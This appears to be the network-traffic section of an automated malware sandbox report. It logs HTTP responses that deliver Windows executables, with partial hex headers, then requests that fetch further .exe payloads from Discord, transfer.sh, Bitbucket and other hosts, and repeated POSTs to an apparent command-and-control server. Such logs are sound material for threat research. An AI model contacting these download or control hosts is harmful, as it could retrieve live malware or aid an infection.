                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:22:56 GMTContent-Type: application/x-msdos-programContent-Length: 339456Connection: closeLast-Modified: Tue, 28 Dec 2021 02:22:02 GMTETag: "52e00-5d42b7c9c3233"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 04 b7 bc 92 40 d6 d2 c1 40 d6 d2 c1 40 d6 d2 c1 2f a0 4c c1 51 d6 d2 c1 2f a0 78 c1 2a d6 d2 c1 49 ae 41 c1 43 d6 d2 c1 40 d6 d3 c1 fd d6 d2 c1 2f a0 79 c1 76 d6 d2 c1 2f a0 48 c1 41 d6 d2 c1 2f a0 4f c1 41 d6 d2 c1 52 69 63 68 40 d6 d2 c1 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 6e f4 01 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ee 03 00 00 20 09 00 00 00 00 00 70 3c 02 00 00 10 00 00 00 00 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 40 0d 00 00 04 00 00 bc 9e 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c ea 03 00 28 00 00 00 00 90 0c 00 88 62 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 24 21 00 00 70 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 a5 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 e8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0e ec 03 00 00 10 00 00 00 ee 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 68 6f 08 00 00 00 04 00 00 8c 00 00 00 f2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 73 69 6b 75 7a 00 00 05 00 00 00 00 70 0c 00 00 02 00 00 00 7e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 65 67 65 6e 65 00 93 0d 00 00 00 80 0c 00 00 0e 00 00 00 80 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 62 00 00 00 90 0c 00 00 64 00 00 00 8e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ee 3b 00 00 00 00 0d 00 00 3c 00 00 00 f2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:23:15 GMTContent-Type: application/x-msdos-programContent-Length: 342528Connection: closeLast-Modified: Tue, 28 Dec 2021 02:23:02 GMTETag: "53a00-5d42b80299e6c"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 04 b7 bc 92 40 d6 d2 c1 40 d6 d2 c1 40 d6 d2 c1 2f a0 4c c1 51 d6 d2 c1 2f a0 78 c1 2a d6 d2 c1 49 ae 41 c1 43 d6 d2 c1 40 d6 d3 c1 fd d6 d2 c1 2f a0 79 c1 76 d6 d2 c1 2f a0 48 c1 41 d6 d2 c1 2f a0 4f c1 41 d6 d2 c1 52 69 63 68 40 d6 d2 c1 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c5 98 8d 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 fa 03 00 00 20 09 00 00 00 00 00 50 4a 02 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 0d 00 00 04 00 00 93 2b 06 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c f8 03 00 28 00 00 00 00 a0 0c 00 88 62 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 0d 00 18 21 00 00 70 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 a5 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 e8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ee f9 03 00 00 10 00 00 00 fa 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 68 6f 08 00 00 10 04 00 00 8c 00 00 00 fe 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 66 69 67 00 00 00 00 05 00 00 00 00 80 0c 00 00 02 00 00 00 8a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 68 69 6c 6f 00 00 00 93 0d 00 00 00 90 0c 00 00 0e 00 00 00 8c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 62 00 00 00 a0 0c 00 00 64 00 00 00 9a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f8 3b 00 00 00 10 0d 00 00 3c 00 00 00 fe 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.2Date: Tue, 28 Dec 2021 02:23:20 GMTContent-Type: application/x-msdos-programContent-Length: 645592Connection: closeLast-Modified: Wed, 08 Dec 2021 03:32:46 GMTETag: "9d9d8-5d29a24b21380"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 13 00 ea 98 3d 53 00 76 08 00 3f 0c 00 00 e0 00 06 21 0b 01 02 15 00 d0 06 00 00 e0 07 00 00 06 00 00 58 10 00 00 00 10 00 00 00 e0 06 00 00 00 90 60 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 20 09 00 00 06 00 00 38 c3 0a 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 07 00 98 19 00 00 00 d0 07 00 4c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 fc 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac d1 07 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 ce 06 00 00 10 00 00 00 d0 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 30 60 2e 64 61 74 61 00 00 00 b0 0f 00 00 00 e0 06 00 00 10 00 00 00 d6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 24 ad 00 00 00 f0 06 00 00 ae 00 00 00 e6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2e 62 73 73 00 00 00 00 98 04 00 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 40 c0 2e 65 64 61 74 61 00 00 98 19 00 00 00 b0 07 00 00 1a 00 00 00 94 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 4c 0a 00 00 00 d0 07 00 00 0c 00 00 00 ae 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 18 00 00 00 00 e0 07 00 00 02 00 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 f0 07 00 00 02 00 00 00 bc 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 fc 27 00 00 00 00 08 00 00 28 00 00 00 be 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 60 01 00 00 00 30 08 00 00 02 00 00 00 e6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 c8 03 00 00 00 40 08 00 00 04 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 35 00 00 00 00 00 4d 06 00 00 00 50 08 00 00 08 00 00 00 ec 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 31 00 00 00 00 00 60 43 00 00 00 60 08 00 00 44 00 00 00 f4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 36 33 00 00 00 00 00 84 0d 00 00 00 b0 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:23:48 GMTContent-Type: application/x-msdos-programContent-Length: 844800Connection: closeLast-Modified: Mon, 27 Dec 2021 16:22:27 GMTETag: "ce400-5d4231c541a6e"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 04 b7 bc 92 40 d6 d2 c1 40 d6 d2 c1 40 d6 d2 c1 2f a0 4c c1 51 d6 d2 c1 2f a0 78 c1 2a d6 d2 c1 49 ae 41 c1 43 d6 d2 c1 40 d6 d3 c1 fd d6 d2 c1 2f a0 79 c1 76 d6 d2 c1 2f a0 48 c1 41 d6 d2 c1 2f a0 4f c1 41 d6 d2 c1 52 69 63 68 40 d6 d2 c1 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 92 ed 9f 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 9e 0b 00 00 26 09 00 00 00 00 00 30 ee 09 00 00 10 00 00 00 b0 0b 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 48 00 00 04 00 00 92 c0 0d 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 9c 0b 00 28 00 00 00 00 40 14 00 90 62 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 00 28 21 00 00 60 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 a5 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 e4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b0 9d 0b 00 00 10 00 00 00 9e 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 68 6f 08 00 00 b0 0b 00 00 8c 00 00 00 a2 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 68 75 77 75 00 00 00 05 00 00 00 00 20 14 00 00 02 00 00 00 2e 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 73 61 78 00 00 00 00 93 0d 00 00 00 30 14 00 00 0e 00 00 00 30 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 90 b2 33 00 00 40 14 00 00 64 00 00 00 3e 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 bc 40 00 00 00 00 48 00 00 42 00 00 00 a2 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 28 Dec 2021 02:23:52 GMTServer: Apache/2.4.18 (Ubuntu)Last-Modified: Mon, 27 Dec 2021 19:51:47 GMTETag: "21af80-5d42608f7478b"Accept-Ranges: bytesContent-Length: 2207616Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 33 98 08 dd 33 32 a2 e3 d0 db df 66 f6 e9 c8 9b f0 ce 43 27 42 7b 62 19 d6 e4 19 09 05 f6 16 cd 2b 9a c3 52 c6 c7 98 88 64 3a 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 4b 95 c0 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 2c 01 00 00 de 03 00 00 00 00 00 00 e0 4b 00 00 10 00 00 00 40 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 4d 00 00 04 00 00 90 20 22 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 49 00 54 01 00 00 00 80 49 00 9c 54 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 73 68 61 72 65 64 00 00 60 49 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 2e 70 64 61 74 61 00 00 00 10 00 00 00 70 49 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 9c 54 02 00 00 80 49 00 9c 54 02 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 44 41 54 41 00 00 00 00 00 80 01 00 00 e0 4b 00 47 7d 01 00 00 5c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Source: global trafficHTTP traffic detected: GET /attachments/812323288264605709/924475642190397461/Hairstyle.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
                        Source: global trafficHTTP traffic detected: GET /get/s3SPeb/A.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh
                        Source: global trafficHTTP traffic detected: GET /evangelioshas/2/downloads/1.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bitbucket.org
                        Source: global trafficHTTP traffic detected: GET /31872cda-a479-44e8-b865-70ba18aaec67/downloads/3d8e64d7-3a3a-4f85-bde4-fe88e5a8d088/1.exe?Signature=LYct25MsH9V1aszIuuA3S95qNtU%3D&Expires=1640659361&AWSAccessKeyId=AKIA6KOSE3BNA7WTAGHW&versionId=BtKtP2E0q4PQvFUo.dOlKBb5196B2WYw&response-content-disposition=attachment%3B%20filename%3D%221.exe%22 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bbuseruploads.s3.amazonaws.com
                        Source: global trafficHTTP traffic detected: GET /erkermacher/eclipse/downloads/Original.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bitbucket.org
                        Source: global trafficHTTP traffic detected: GET /931d4d65-0999-46ef-a088-c6ca413195e0/downloads/d4407d09-c074-4208-91cf-dd06968366b5/Original.exe?Signature=cP199pYfJwRSEMBSNgZo4gpVPkI%3D&Expires=1640659850&AWSAccessKeyId=AKIA6KOSE3BNA7WTAGHW&versionId=qHsyz7Z0XxrBSgIUQ7vNQcW7uixcA2m1&response-content-disposition=attachment%3B%20filename%3D%22Original.exe%22 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bbuseruploads.s3.amazonaws.com
                        Source: global trafficHTTP traffic detected: GET /attachments/925145879403446292/925145901322879006/top.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
                        Source: global trafficHTTP traffic detected: GET /x009B.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: downloafilesaccess.ddns.net
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://edrbthhhm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 209Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iqsorlppj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 360Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytools-foryou-777.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ynjhvuqfxb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 354Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ltxeprficx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ggafm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 259Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ruicmqoob.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 138Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fsddvkyhh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 298Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ivcrcx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hewpcmebv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 167Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ypnfj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 171Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: GET /files/5376_1640094939_1074.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xrbnvbr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 209Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tckdyenm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 328Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iiojucb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 297Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://igeku.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 235Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iuyeipw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 264Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xuifp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 136Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://afxqeyx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 351Host: host-data-coin-11.com
